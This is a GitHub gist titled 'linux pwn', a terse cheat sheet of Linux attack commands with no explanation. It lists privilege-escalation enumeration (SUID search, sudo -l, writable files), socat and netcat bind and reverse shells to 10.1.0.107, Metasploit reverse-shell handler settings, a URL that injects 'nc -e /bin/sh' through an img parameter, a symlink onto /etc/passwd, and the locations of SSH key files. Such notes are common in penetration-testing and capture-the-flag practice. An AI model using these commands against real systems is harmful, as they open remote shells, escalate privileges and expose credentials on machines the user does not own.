Last active
December 29, 2021 11:36
-
-
Save duketwo/03ed92fa44c7ce3e4b73f86e8d32ca19 to your computer and use it in GitHub Desktop.
linux pwn
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null | |
ls -alh /etc/cron.* | |
sudo -l | |
ps -aux | |
netstat -tulpn | |
ss -ls | |
find / -type f -writable 2>&1 | grep -v 'Permission denied' | |
dpkg -l | grep X | |
python3 -m http.server | |
find / -user root -perm -4000 -exec ls -ldb {} | |
socat TCP-LISTEN:1333,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane | |
socat FILE:`tty`,raw,echo=0 TCP:10.1.0.107:1333 | |
export TERM=xterm | |
export SHELL=bash | |
stty rows 40 columns 170 | |
nc –lvp 1333 | |
nc 10.1.0.107 1333 –e /bin/bash | |
nc 10.1.0.107 1333 –e /bin/sh | |
nmap -sV -p- --version-intensity 9 10.2.32.7 | |
use multi/handler | |
set payload cmd/unix/reverse_netcat | |
set payload linux/x64/shell/reverse_tcp | |
set payload linux/x86/shell/reverse_tcp | |
set LHOST 10.1.0.107 | |
run | |
http://10.2.32.2/lndex.php?img=nc%20-e%20/bin/sh%2010.1.0.107%204444 | |
nc-e /bin/sh 10.1.0.107 4444 | |
post/multi/manage/shell_to_meterpreter | |
touch foo | |
ln -sf /etc/passwd foo | |
cat file | xclip -selection clipboard | |
ssh key files: id_rsa id_rsa.pub known_hosts authorized_keys (user/.ssh/) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment